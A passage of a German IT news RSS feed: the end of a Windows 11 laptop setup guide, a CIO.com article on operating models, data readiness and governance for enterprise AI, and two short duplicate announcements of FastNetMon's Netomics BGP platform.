<p><strong>Tipp</strong>: Installieren Sie Ihre wichtigsten Programme gleich nach dem Update-Durchlauf. So haben Sie bei späteren Problemen einen klaren Systemstand, auf den Sie sich verlassen können. Mit <a href="https://ninite.com/" target="_blank" rel="noreferrer noopener">Ninite</a> können Sie übrigens mehrere Programme gleichzeitig installieren, ohne nervige Toolbars oder Zusatzsoftware.</p>



<h2 class="wp-block-heading">4. Wichtige Windows-Einstellungen für Laptops</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf37f3c3"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Windows-11-Datenschutz-Einstellungen.png?w=1200" alt="Windows 11 Datenschutz Einstellungen" class="wp-image-2945555" width="1200" height="644" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Ein paar kurze, aber wichtige Einstellungen zum Datenschutz sollten Sie bei Windows 11 unbedingt vornehmen.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Windows 11 bringt viele smarte Funktionen mit, die sind aber bei Weitem nicht alle optimal vorkonfiguriert. Ein paar Klicks in den Einstellungen machen den Alltag deutlich angenehmer (und sicherer):</p>



<ul class="wp-block-list">
<li><strong>Datenschutz:</strong> Unter <em>Einstellungen → Datenschutz und Sicherheit → Windows-Berechtigungen</em> können Sie überflüssige Telemetrie, Werbung und Standortzugriffe abschalten.</li>



<li><strong>Windows Defender:</strong> Prüfen Sie unter <em>Windows Sicherheit → Viren- und Bedrohungsschutz</em>, ob der Echtzeitschutz aktiv ist.</li>



<li><strong>Onedrive-Sync:</strong> Falls Sie lokale Ordner bevorzugen, deaktivieren oder begrenzen Sie den automatischen Upload.</li>



<li><strong>Standard-Apps:</strong> Wählen Sie Ihre bevorzugten Programme für Browser, Mail und Fotos – sonst öffnet Windows gerne ungefragt Edge &amp; Co. Die Einstellungen finden Sie unter „Standard-Apps“ (einfach ins Start-Fenster tippen). Über <em>Einstellungen → Apps → Standard-Apps</em> kommen Sie ebenfalls ans Ziel.</li>
</ul>



<p><strong>Tipp</strong>: Aktivieren Sie die Option <strong>„Dateiendungen anzeigen“</strong> im Datei-Explorer. Das erleichtert das Erkennen verdächtiger Dateien und ist ein einfacher Schutz gegen Phishing und Schad-Software. Klicken Sie dazu in der Menüleiste auf <em>Ansicht</em> und setzen Sie ein Häkchen bei “Dateinamenerweiterungen”.</p>



<h2 class="wp-block-heading">5. Touchpad, Tastatur und Funktionstasten konfigurieren</h2>



<p>Gerade bei Laptops ist das Feintuning der Eingabegeräte Gold wert. Ein zu empfindliches Touchpad oder eine unpraktische FN-Belegung können schnell nerven und Arbeitsprozesse bremsen – solche Probleme sind aber schnell behoben.</p>



<ul class="wp-block-list">
<li><strong>Touchpad-Gesten:</strong> Öffnen Sie <em>Einstellungen → Bluetooth und Geräte → Touchpad</em>. Hier können Sie Gesten für Scrollen, Zoomen und Desktop-Wechsel anpassen oder deaktivieren.</li>



<li><strong>Mausgeschwindigkeit:</strong> In denselben Einstellungen lässt sich die Zeigergeschwindigkeit anpassen („Cursergeschwindigkeit“).</li>



<li><strong>Funktionstasten:</strong> Viele Hersteller bieten Tools wie <em><a href="https://rog.asus.com/de/content/armoury-crate/" target="_blank" rel="noreferrer noopener">Asus Armoury Crate</a></em> oder <em><a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/document/ish_9869091-9958272-16" target="_blank" rel="noreferrer noopener">HP Command Center</a></em>, um FN-Tasten zu konfigurieren. Prüfen Sie dort, ob Helligkeit, Lautstärke und Lüftersteuerung korrekt reagieren.</li>
</ul>



<p><strong>Tipp</strong>: Nutzen Sie Drei-Finger-Gesten für Multitasking. Damit können Sie blitzschnell zwischen Apps wechseln oder zum Desktop springen. Das spart Zeit im Alltag und erlaubt entspannteres Arbeiten.</p>



<h2 class="wp-block-heading">6. Akku und Energieeinstellungen optimieren</h2>



<p>Ein frischer Akku hält am Anfang lange durch – mit den richtigen Einstellungen läuft das neue Notebook aber noch effizienter. Windows 11 bietet mehrere Möglichkeiten, um Laufzeit, Performance und Stromverbrauch fein abzustimmen.</p>



<p>So holen Sie das Maximum heraus:</p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <em>Einstellungen → System → Strom und Akku</em>.</li>



<li>Unter <strong>Energiestatus </strong>wählen Sie, was Ihnen wichtiger ist: <strong>Beste Energieeffizienz, Ausbalanciert </strong>oder <strong>Beste Leistung</strong>.</li>



<li>Sie können die Bildschirmhelligkeit im Akkubetrieb um ein paar Stufen reduzieren – das bringt oft 30 bis 60 Minuten mehr Laufzeit.</li>



<li>Aktivieren Sie den <strong>Energiesparmodus</strong>, wenn der Akkustand unter 30 Prozent fällt.</li>
</ol>



<p><strong>Tipp für Technikfans</strong>: Erstellen Sie mit dem Befehl „<em>powercfg /batteryreport“ </em>im Terminal (Win + X → Terminal (Admin)) <a href="https://www.pcwelt.de/article/1141612/akku-kapazitaet-unter-windows-ermitteln.html" target="_blank" rel="noreferrer noopener">einen detaillierten Akkubericht.</a> Der zeigt, wie oft Ihr Akku schon geladen wurde, welche Kapazität er noch hat und wann es Zeit für einen Austausch wird.</p>



<p>Um Ihren Akku dauerhaft zu schonen, empfehlen wir außerdem:</p>



<ul class="wp-block-list">
<li>Regelmäßige Zwischenladungen statt Dauerbetrieb am Netzteil.</li>



<li>Keine dauerhafte 100-Prozent-Ladung, das stresst die Energiezellen.</li>



<li>Bei längerer Nichtnutzung: Akku auf circa 50 Prozent laden und kühl lagern (aber nicht kalt).</li>
</ul>



<h2 class="wp-block-heading">7. Sicherheit und Datenschutz stärken</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a54eaf380700"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/11/geraeteverschlusselung-01.png" alt="Windows 11 Home kommt mit der Geräteverschlüsselung. Diese bringt aber nicht die Einstellungsmöglichkeiten, die Bitlocker nutzt." class="wp-image-2513445" width="1024" height="647" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Unsichtbarer Bodyguard: Bitlocker verschlüsselt bei Bedarf die gesamte Festplatte. So sind Dokumente, Fotos oder sensiblen Dateien robust gegen Fremdzugriffe geschützt.</figcaption></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sobald Ihr System läuft, sollten Sie den Sicherheitsgurt anlegen – sprich: die wichtigsten Schutzfunktionen aktivieren. Windows 11 bringt dafür schon alles mit, Sie müssen es nur einschalten oder prüfen.</p>



<p><strong>Empfohlene Schritte:</strong></p>



<ol start="1" class="wp-block-list">
<li><strong>Windows Hello aktivieren</strong> – unter <em>Einstellungen → Konten → Anmeldeoptionen</em> können Sie eine PIN, Fingerabdruck oder Gesichtserkennung einrichten.</li>



<li><strong>Bitlocker oder Geräteverschlüsselung</strong> aktivieren – so sind Ihre Daten auch bei Diebstahl geschützt.</li>



<li><strong>Firewall prüfen</strong> – die sollte immer aktiv sein.</li>



<li><strong>WLAN-Sicherheit</strong>: Alte Netzwerke löschen, öffentliche Hotspots meiden oder <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">per VPN absichern</a>.</li>
</ol>



<p><strong>Tipp</strong>: Wenn Sie Windows 11 Pro nutzen (<a href="https://software.pcwelt.de/offer/windows-11-professional-upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">das Upgrade auf die Pro-Version bekommen Sie hier für nur 59,99 Euro</a>), sollten Sie <strong>Bitlocker</strong> aktivieren. Das verschlüsselt die komplette Festplatte und lässt sich mit Ihrem Microsoft-Konto koppeln. Bei Geräten mit TPM 2.0 (Standard seit 2021) funktioniert das ganz automatisch. Wenn Sie maximale Kontrolle über Ihre Privatsphäre haben wollen: Tools wie <a href="https://www.oo-software.com/de/shutup10" target="_blank" rel="noreferrer noopener">O&amp;O ShutUp10++</a> helfen, versteckte Telemetrie-Dienste mit einem Klick zu deaktivieren.</p>



<h2 class="wp-block-heading">8. Backup und Wiederherstellung einrichten</h2>



<p>Nichts ist ärgerlicher, als ein perfekt eingerichtetes System zu verlieren, weil ein Update dazwischenfunkt oder ein Virus zuschlägt. Darum unsere Empfehlung: gleich zu Beginn ein <strong>Gesamtbackup</strong> anlegen.</p>



<p><strong>So geht’s:</strong></p>



<ol start="1" class="wp-block-list">
<li>Öffnen Sie <em>Systemsteuerung → System und Sicherheit → Sichern und Wiederherstellen (Windows 7).</em> Lassen Sie sich dabei nicht vom Begriff „Windows 7“ irritieren, das ist nur eine alte Bezeichnung, an der Microsoft festhält.</li>



<li>Wählen Sie <strong>„Systemabbild erstellen“</strong> und speichern Sie es auf einer externen Festplatte.</li>



<li>Danach am besten gleich einen <strong>Wiederherstellungspunkt</strong> setzen. Tippen Sie dafür einfach „Wiederherstellungspunkt erstellen“ in die Suche.</li>
</ol>



<p><strong>Tipp</strong>: Alternativ können Sie auch Cloud-Dienste wie Onedrive oder Google Drive nutzen, um persönliche Dateien automatisch zu sichern. Wer es bequem mag und bereit ist, etwas Geld auszugeben, greift zu Tools wie <a href="https://www.macrium.com/reflectfree" target="_blank" rel="noreferrer noopener">Macrium Reflect</a> oder <a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/">Acronis Tru</a><a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/" target="_blank" rel="noreferrer noopener">e</a><a href="https://www.jdoqocy.com/click-1676582-12843474?sid=rss&amp;url=https://www.acronis.com/de/products/true-image/"> Image</a>. Damit erstellen Sie komplette Abbilder und planen regelmäßige Backups automatisch.</p>



<h2 class="wp-block-heading">9. Performance-Tuning und Komfortfunktionen</h2>



<p>Ein paar schnelle Handgriffe machen Windows nicht nur schneller, sondern auch komfortabler.<br>Hier sind die besten Sofortmaßnahmen:</p>



<ul class="wp-block-list">
<li><strong>Autostart-Programme reduzieren:</strong> Im Task-Manager (Strg + Shift + Esc → „Autostart“) deaktivieren Sie alles, was Sie nicht ständig benötigen.</li>



<li><strong>Speicheroptimierung aktivieren:</strong> <em>Einstellungen → System → Speicher</em> → „Speicheroptimierung“ einschalten. Windows löscht dann automatisch temporäre Dateien.</li>



<li><strong>Visuelle Effekte anpassen:</strong> „Erweiterte Systemeinstellungen“ in die Suche eingeben und über <em>Erweitert → Leistung → Einstellungen</em> die Funktion „Für optimale Leistung anpassen“ auswählen.</li>



<li><strong>Snap-Layouts und virtuelle Desktops</strong> nutzen: Mit <strong>Win + Z</strong> Fenster flexibel anordnen und mit <strong>Win + Tab</strong> zwischen Arbeitsflächen wechseln.</li>
</ul>



<p><strong>Tipp</strong>: Für Power-User lohnt sich ein Blick auf <a href="https://www.pcwelt.de/article/2493169/nuetzliche-microsoft-powertoys-funktionen.html" target="_blank" rel="noreferrer noopener">Powertoys</a>. Das kostenlose Microsoft-Tool liefert Zusatzfunktionen wie Fenster-Snap, Tastenkürzel oder Farbpipette.</p>



<h2 class="wp-block-heading">10. Bonus: Extras für Fortgeschrittene</h2>



<p>Wenn Sie es ganz genau nehmen wollen, können Sie jetzt noch ein paar Feineinstellungen vornehmen, die oft nur erfahrene Nutzer kennen:</p>



<ul class="wp-block-list">
<li><strong>BIOS/UEFI prüfen:</strong> Mit <em>Entf</em> oder <em>F2</em> beim Start aufrufen. Dort können Sie Secure Boot, Bootreihenfolge oder Lüfterprofile anpassen.</li>



<li><strong>Hersteller-Tools checken:</strong> Programme wie <a href="https://www.asus.com/de/support/myasus-deeplink/" target="_blank" rel="noreferrer noopener">My Asus</a>, <a href="https://lenovo.7eer.net/c/230135/217393/3786?u=https://support.lenovo.com/de/de/solutions/ht505081&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Lenovo Vantage</a> oder <a href="https://clk.tradedoubler.com/click?p=245747&amp;a=1573066&amp;epi=rss&amp;url=https://support.hp.com/de-de/help/hp-support-assistant" target="_blank" rel="noreferrer noopener">HP Support Assistant</a> liefern Firmware-Updates – entscheiden Sie selbst, welche Sie nutzen oder behalten möchten.</li>



<li><strong>Gaming-Optimierung:</strong> Bei Notebooks mit dedizierter GPU lohnt es sich, die Energieprofile in der Grafikkartensteuerung zu prüfen.</li>



<li><strong>Windows-Features deaktivieren:</strong> <em>Systemsteuerung → Programme <em>→ Programme</em></em> <em>und Features → Windows-Features aktivieren oder deaktivieren</em> – hier lassen sich unnötige Dienste wie „Internet Explorer 11“ oder „XPS-Dienste“ abschalten.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Traumstart für Ihr neues Notebook</h2>



<p>Ein neues Notebook ist wie ein leeres Notizbuch. Es lohnt sich, die ersten Seiten ordentlich zu gestalten. Mit diesen zehn Schritten sichern Sie sich Leistung, Datenschutz und Komfort von Anfang an. Nach der kurzen Einrichtung läuft Ihr Windows 11 dann so stabil, schnell und individuell, wie es sollte. Mit weniger Ballast und Neugier – dafür mit mehr Komfort und Sicherheit.</p>



<p><strong>Extra-Tipp: </strong>Wenn Sie noch mehr aus Ihrem System herausholen wollen, lesen Sie auch: <a href="https://www.pcwelt.de/article/1807849/tipps-windows-pc-schneller.html" target="_blank" rel="noreferrer noopener">kostenlose Tipps, damit Ihr Windows-PC schneller läuft</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs must rethink operating models to unlock AI at scale]]></title>
<description><![CDATA[Almost every company has a board or executive AI mandate. Vendors are rolling out agentic AI platforms. The pressure to move is intense.



But the reality on the ground looks different. Eighty-three percent of organizations say data quality is their top AI challenge, and 74% struggle to demonstr...]]></description>
<link>https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</guid>
<pubDate>Mon, 13 Jul 2026 12:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Almost every company has a <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">board or executive AI mandate</a>. Vendors are rolling out agentic AI platforms. The pressure to move is intense.</p>



<p>But the reality on the ground looks different. Eighty-three percent of organizations say <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">data quality is their top AI challenge</a>, and 74% struggle to demonstrate ROI, according to Lopez Research. And only 21% report having a mature <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">governance model for AI agents</a>, per Deloitte’s <a href="https://www.deloitte.com/us/en/about/press-room/state-of-ai-report-2026.html" rel="nofollow">2026 State of Enterprise AI</a> report.</p>



<p>“Agentic AI is real, and vendors’ offerings are very real, too,” says <a href="https://www.forrester.com/analyst-bio/boris-evelson/BIO1737" rel="nofollow">Boris Evelson</a>, vice president and principal analyst at Forrester. “However, most enterprises are still not ready to adopt at scale.”</p>



<p><a href="https://www.westmonroe.com/our-team/david-hilborn" rel="nofollow">Dave Hilborn</a>, who leads West Monroe’s Organization, People &amp; Change practice, frames it as a race with three arrows moving forward — one representing AI and tech evolution, one representing organizations and people, and one representing data. “The AI arrow is far out ahead,” he says. “That delta is the readiness gap.”</p>



<p>The gap <a href="https://www.cio.com/article/4192383/its-not-the-it-holding-ai-back-its-the-business-processes.html">isn’t the technology</a>. It’s the foundational work most organizations haven’t done: data readiness, operating models, governance, skills, and culture. The companies making progress aren’t waiting for vendors to solve these problems. They’re tackling the unglamorous work themselves.</p>



<h2 class="wp-block-heading">AI doesn’t tolerate ambiguity</h2>



<p>AI readiness can be framed across six levels — from data foundation at the base to <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">reinvented business experiences</a> at the top, says <a href="https://www.linkedin.com/in/afsheantalasaz/" rel="nofollow">Afshean Talasaz</a>, former CIO at Colonial Pipeline and now an executive advisor. One of the key areas that doesn’t always get the attention it needs is the operating model.<strong></strong></p>



<p>“The technology playbooks of the past don’t work in the AI world,” Talasaz says. “Those areas were able to tolerate more ambiguity between business and tech teams. AI doesn’t tolerate the same level of ambiguity. It needs clarity.”</p>



<p>That demands a different kind of partnership between IT and the business. AI systems learn from data — records and measurements of what’s actually happening in the business — and then operate within business processes. Unlike traditional software, which is built based on user requirements, AI is sandwiched between the business that produces the data and the business that consumes the outputs.</p>



<p>“AI is requiring IT and business teams to work more closely together, to be clearer about what AI will and will not do — that really close partnership is crucial,” Talasaz says. “It’s not something that will always naturally evolve. It requires a lot of intentionality about how teams need to work together to deliver outcomes.”</p>



<p>The <a href="https://www.cio.com/article/3801027/10-ai-strategy-questions-every-cio-must-answer.html">AI questions CIOs must answer</a> aren’t just technical. Do we have the right operating model? Have we balanced governance and standard operating procedures within the model? Have we organized teams appropriately? All this must be designed within the context of what the business actually needs.</p>



<p>Too many organizations are <a href="https://www.cio.com/article/4159287/most-companies-are-stuck-on-ai-chat.html">bolting AI onto existing processes</a> without redefining roles or workflows, Forrester’s Evelson. “Organizations can either incrementally enhance existing workflows by augmenting capabilities with AI or pursue a more transformative approach by redesigning the process end-to-end.”</p>



<p>The companies getting value are doing the latter.</p>



<h2 class="wp-block-heading">Data debt comes due</h2>



<p>Data readiness remains the most common barrier to scaling AI. “We’ve never fixed this data quality problem in most organizations,” says <a href="https://www.lopezresearch.com/" rel="nofollow">Maribel Lopez</a>, founder and principal analyst at Lopez Research, “and it comes back to haunt a company in spades as they move to AI.”</p>



<p>At Levi Strauss, the foundational work came first. “If you think about the Levi’s business, it’s quite complex — 100 countries, over 3,000 stores, multiple business models,” says <a href="https://www.levistrauss.com/who-we-are/leadership/jason-gowans/" rel="nofollow">Jason Gowans</a>, the company’s chief digital and technology officer. “You can imagine the complexity of gathering all that data to understand how the business is performing. The idea of this single source of truth — that’s been the biggest thing.”</p>



<p>Levi’s now has more than 1,100 standard operating procedures that govern how work gets done on top of SAP. “That’s fertile material to feed to LLMs on how work gets done,” Gowans says.The results are tangible: partner onboarding that once took three to six months to set up EDI exchanges now takes days.</p>



<p>At contract manufacturing company Jabil, <a href="https://www.linkedin.com/in/chase-christensen-b0447/" rel="nofollow">Chase Christensen</a>, segment CIO, took a similar path. “We had to get everyone to understand where the source data resides, put tech in place so consumption is easier, and drive ownership around data and decision rights — so 140,000 employees don’t feel empowered to create their own data sources that fall out of line.”</p>



<p>The data challenge goes beyond quality, Evelson notes. <a href="https://www.cio.com/article/4104444/8-tips-for-rebuilding-an-ai-ready-data-strategy.html">Most organizations’ data isn’t AI-ready</a>; it hasn’t been prepared for how AI systems consume and learn from information. “Data is siloed, poorly governed, and hard to discover, integrate, and trust,” he says.</p>



<p>Forrester research shows that 45% of data and analytics decision-makers were adopting vector databases in 2025, and 53% were adopting graph databases — investments that signal recognition of how much data architecture needs to evolve. The firm recommends a balanced approach: roughly 48% of AI spending on foundations such as data management and engineering, and 52% on consumption, including analytics, governance, and applications.</p>



<p>But even as organizations work to prepare existing data, AI is creating new challenges. Users leveraging AI tools are generating new forms of data and information that never make it into corporate databases, West Monroe’s Hilborn notes.</p>



<p>“There are explosions of new data, content, and insights being created on the periphery of these data lakes,” he says. “The challenge is how do you capture that and leverage it.”</p>



<h2 class="wp-block-heading">Who’s sponsoring this?</h2>



<p>Even when data is in order, many AI initiatives stall due to how they’re sponsored and funded.</p>



<p>“Enterprise data, analytics, and AI programs succeed when business CxOs sponsor them because they are accountable for business outcomes, not just technology delivery,” Forrester’s Evelson says. “IT-led initiatives often become siloed or tool-centric, whereas business sponsorship ensures alignment to enterprise strategy, prioritization of end-to-end use cases, and a focus on decisions and actions rather than insights alone.”</p>



<p>Too often, AI is still treated as a series of disconnected use cases rather than a sustained, multi-year investment. Evelson calls this the “use case trap” — organizations overindex on individual projects and miss the enterprise-wide compounding impact. That leads to fragmented priorities, inconsistent adoption, and difficulty demonstrating ROI.</p>



<p>Leadership readiness is a distinct layer of AI preparedness, Talasaz says. “Are leaders prepared to provide a vision of reinvented business experiences that become the north star?” he asks. “Leadership teams, at various levels of the organization, need to articulate what a reinvented business looks like so teams have the direction and support to build differentiating capabilities.”</p>



<p>Levi’s offers a counterexample. AI is a CEO priority there. At the last quarterly offsite, the execs were building agents. “When you’re committed to upskilling the workforce, you’re better served to answer how to rewire processes with AI at the core,” Gowans says. “It starts at the top. It has to be an exec priority.”</p>



<h2 class="wp-block-heading">Fear, literacy, and two types of AI</h2>



<p>Technical talent is only part of the equation. Organizations also need to <a href="https://www.cio.com/article/4016354/cios-tackle-the-ai-change-management-challenge.html">address change management</a>.</p>



<p>“We saw it with the AI boom — fear about jobs, not knowing what AI did,” says Jabil’s Christensen. “The key is demystifying AI. We doubled down and focused on AI literacy. We want everyone to understand how it was put together, and that removed a lot of that fear. That’s been the biggest hurdle.”</p>



<p>Different types of AI require different skills and governance, Talasaz says. “General use focuses on productivity on the desktop,” he says. “Integrated AI — industrial-capable AI embedded within core business processes — requires different skills, capabilities, and governance.”</p>



<p>For desktop AI, training and guardrails help employees be successful — what Talasaz calls “bumpers,” like in bowling. Organizations need to <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">help employees through reskilling and guidance</a>. “You have tools in a toolbox,” he says. “It’s important to know when to use a power tool versus when you need a screwdriver.”</p>



<p>But for integrated AI embedded in core processes, the stakes are higher. “Business leaders responsible for business outcomes based on AI-driven processes need to be fully aware of both the benefits and risks that come along with using these tools,” Talasaz says.</p>



<p>That distinction matters for governance, too. Lower-, medium-, and high-risk AI use cases may require <a href="https://www.csoonline.com/article/4188573/rethinking-the-balance-between-ai-oversight-and-innovation.html">different ways of working and different risk management approaches</a>. “Deploying AI in potentially high-risk or high-cost areas of the business requires a higher level of rigor,” Talasaz says. “That’s different than building something that helps write my emails.”</p>



<h2 class="wp-block-heading">From POC to production</h2>



<p>Perhaps the biggest readiness gap is the transition <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html">from proof of concept to production</a>. “It requires such a different approach,” Talasaz says. “A successful proof of concept can create a lot of excitement, but when teams are unprepared to build and scale, it can create the potential to over-promise and under-deliver.”</p>



<p>The operating model that works for experimentation doesn’t work for production at scale. Proofs of concept are designed to demonstrate the efficacy of ideas and the underlying technology. But building, scaling, and sustaining technology in the business requires operating models, standards, roles, and skills that many organizations haven’t developed. Intentionally designed operating models reduce the cost of learning, improve execution, and increase delivery velocity, says Talasaz.</p>



<p>But there’s no one-size-fits-all answer. “A business that needs to build capabilities in a marketplace moving very fast requires one kind of operating model,” Talasaz says. “A business that can take longer to develop business capabilities and adapt to market changes can choose a different operating model. It’s important to design ways of working tailored to what the business needs and the speed at which the business needs to leverage technology to be successful.”</p>



<p>Jabil is navigating this journey as part of its move to SAP’s cloud ERP through RISE, scaling from $29 billion to $34 billion in revenue while keeping selling, general, and administrative (SG&amp;A) expenses relatively flat — in part by layering generative AI onto predictive analytics capabilities built over years.</p>



<p>“We started years ago with computer vision to drive product quality,” Christensen says. “As gen AI blew up, we took the predictive analytics we had <a href="https://www.cio.com/article/193580/upskilling-transforms-jabil-employees-into-data-scientists.html">built over the years</a> and imbued them with gen AI. We’ve implemented the basics, and now we’re looking for complex scenarios.”</p>



<h2 class="wp-block-heading">Governance built in, not bolted on</h2>



<p>Governance is often treated as a policy document or committee. It should be embedded in the operating model itself, Talasaz argues.</p>



<p>“The operating model doesn’t always get the attention it needs,” he says. “Policies and committees are useful, but they should handle larger enterprise risks. Most of the governance should be embedded in the operating model to ensure you’re getting outcomes you want.”</p>



<p>That might mean peer review built into the development process, bias checks before deployment, or clear escalation paths for high-risk use cases. When governance is separate from the operating model, it tends to slow things down. When it’s integrated, it becomes how work naturally gets done, says Talasaz.</p>



<p>Governance at the agent level matters, too, Levi’s Gowans says. “Know what agents have been deployed, who authored them, and who’s responsible,” he says, noting that the company has established a registry to understand what agents it has operating within its networks.</p>



<p>The challenges of AI governance are unique, Lopez of Lopez Research says. “Very few people have the governance stack required to say they did the right things with AI,” she says. “<a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Non-human identity</a> and access control is totally different and, frankly, evolving so quickly that no one knows what to do.”</p>



<p>The challenge is ultimately a trade-off, Forrester’s Evelson says. “Push agentic AI capabilities too far, and you risk creating a governance and compliance nightmare,” he says. “Tighten controls too aggressively, and you stifle innovation. Best practices for <a href="https://www.cio.com/article/4188566/cios-rethink-the-balance-between-ai-oversight-and-innovation.html">striking the right balance</a> are still being discovered.”</p>



<h2 class="wp-block-heading">It takes a team</h2>



<p>The AI readiness gap isn’t about technology — it’s about the work organizations have been deferring for years. Data quality. Operating models. Executive sponsorship. Skills and culture. Governance embedded in process.</p>



<p>“Once you progress from everyone using Copilot to putting agents in production, then you realize the need for business context,” Gowans of Levi Strauss says.</p>



<p>It’s a shared journey requiring all teams to understand what’s required, Talasaz says. “It involves helping people understand what it takes from all sides — the technology itself, the operating model, the skills and talents needed — but also working with business leaders on the art of the possible,” he says. “Helping them understand both the benefits and the responsibility of deploying this tech.”</p>



<p>A colleague of his calls AI “the ultimate executive team sport.”</p>



<p>“It requires people to do it well and manage it,” Talasaz says.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon eliminates third-party bgp lookups with Netomics]]></title>
<description><![CDATA[FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Ex...]]></description>
<link>https://tsecurity.de/de/3664869/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664869/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</guid>
<pubDate>Mon, 13 Jul 2026 12:08:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Exchange Points (IXPs)…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/">FastNetMon eliminates third-party bgp lookups with Netomics</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon eliminates third-party bgp lookups with Netomics]]></title>
<description><![CDATA[FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built for internet service providers (ISPs), cloud providers, Internet Ex...]]></description>
<link>https://tsecurity.de/de/3664791/it-security-nachrichten/fastnetmon-eliminates-third-party-bgp-lookups-with-netomics/</link>
